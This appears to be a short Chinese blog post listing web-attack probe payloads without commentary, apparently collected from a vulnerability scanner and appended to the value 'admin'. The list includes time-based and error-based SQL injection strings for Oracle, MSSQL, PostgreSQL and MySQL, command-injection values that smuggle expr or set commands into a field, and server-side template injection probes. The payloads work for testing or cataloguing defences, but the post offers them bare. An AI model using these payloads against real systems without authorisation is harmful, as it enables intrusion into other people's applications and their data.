大量SQL数据注入的样本

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s

admin'and(select+1)>0waitfor/**/delay'0:0:0

admin'/**/and(select'1'from/**/pg_sleep(0))>'0

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="

admin'and(select*from(select+sleep(3))a/**/union/**/select+1)='

admin'and'c'='c

admin'"\(

admin鎈'"\(

expr 806611221 + 997466205

admin&set /A 911413438+906089431

admin$(expr 962935251 + 929380135)

admin|expr 930840201 + 873592254

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1451267485')))

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1199487333')))>'0

admin expr 983037841 + 840750877

admin'and(select'1'from/**/cast(md5(1580157050)as/**/int))>'0

extractvalue(1,concat(char(126),md5(1301020577)))

admin"and/**/extractvalue(1,concat(char(126),md5(1922575879)))and"

admin'and/**/extractvalue(1,concat(char(126),md5(1634038968)))and'

<%- 988389609+885309036 %>

#set($c=884874869+877967656)${c}$c

${987581318+821613195}

/*1*/{{894643765+956323033}}

'-var_dump(md5(572828254))-'

oyrmiljureqiplwuafks

%{41744*44696}

'+(40086*41722)+' 

 

posted on 2021-06-15 23:05  漫思  阅读(1949)  评论(0编辑  收藏  举报

导航